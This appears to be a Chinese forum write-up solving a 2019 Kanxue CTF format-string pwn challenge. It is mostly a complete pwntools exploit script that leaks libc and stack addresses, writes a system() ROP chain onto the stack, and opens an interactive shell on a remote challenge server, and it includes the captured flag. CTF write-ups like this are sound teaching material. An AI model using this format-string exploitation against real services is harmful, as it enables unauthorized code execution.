-
-
[原创]【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP
-
2019-7-2 00:12
4892
-
[原创]【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP
【2019看雪CTF】Q2赛季 第三题 金字塔的诅咒 WP
此题是比较简单的fmt类型的pwn题(此赛季唯一一个libc2.23的pwn题)。
因为是32位的elf,所以一切要简单得多,只不过有两个小小的限制,一是输入存放在bss上,而且是开PIE的;二是每次输入要求不大于24字节。
大概思路是:(都是fmt的利用)从栈上leak出libc地址和栈地址(栈上有ebp链,有了栈指针当然有栈地址),可通过ebp的栈指针构造指向其它栈地址的栈指针,从而实现栈的任意写,最终在栈上构造好system的rop实现get shell。
最终exp如下:
#!/usr/bin/env python
from pwn import *
s = lambda a: io.send(a)
sa = lambda a, b: io.sendafter(a, b)
st = lambda a, b: io.sendthen(a, b)
sl = lambda a: io.sendline(a)
sla = lambda a, b: io.sendlineafter(a, b)
slt = lambda a, b: io.sendlinethen(a, b)
r = lambda a=0x100: io.recv(a)
rl = lambda: io.recvline()
ru = lambda a: io.recvuntil(a)
it = lambda: io.interactive()
def pwn():
#flag{c6671fc0-cea3-42ef-8af0-c20c65f854be}
libc_main_off = 0x18540
bin_off = 0x15902B
sys_off = 0x3A940
# libc_main_off = 0x18540
# bin_off = 0x15BA0B
# sys_off = 0x3Ada0
sla('Choice:','1')
sla('to say:','%11$p%5$p')
res = rl()
libc_main_addr = int(res[2:10],16) - 247
stack_addr = int(res[12:20],16)
sys_addr = libc_main_addr - libc_main_off + sys_off
bin_addr = libc_main_addr - libc_main_off + bin_off
log.info('sys addr :'+hex(sys_addr))
sla('Choice:','1')
sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%53$hn'%((sys_addr)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%5$hn'%((stack_addr-0x98+2)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%53$hn'%((sys_addr>>16)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%53$hn'%((bin_addr)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%5$hn'%((stack_addr-0x90+2)&0xffff))
sla('Choice:','1')
sla('to say:','%%%dc%%53$hn'%((bin_addr>>16)&0xffff))
# gdb.attach(io,'b main')
sla('Choice:','2')
it()
if __name__ == '__main__':
context(arch='i386', kernel='i386', os='linux')
HOST, PORT = '152.136.18.34', 9999
# elf = ELF('./libc.so.6')
if len(sys.argv) > 1 and sys.argv[1] == 'l':
io = process('./format')#,env = {'LD_PRELOAD':'./libc.so.6'})
context.log_level = 'debug'
else:
io = remote(HOST, PORT)
# context.log_level = 'debug'
pwn()
[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法
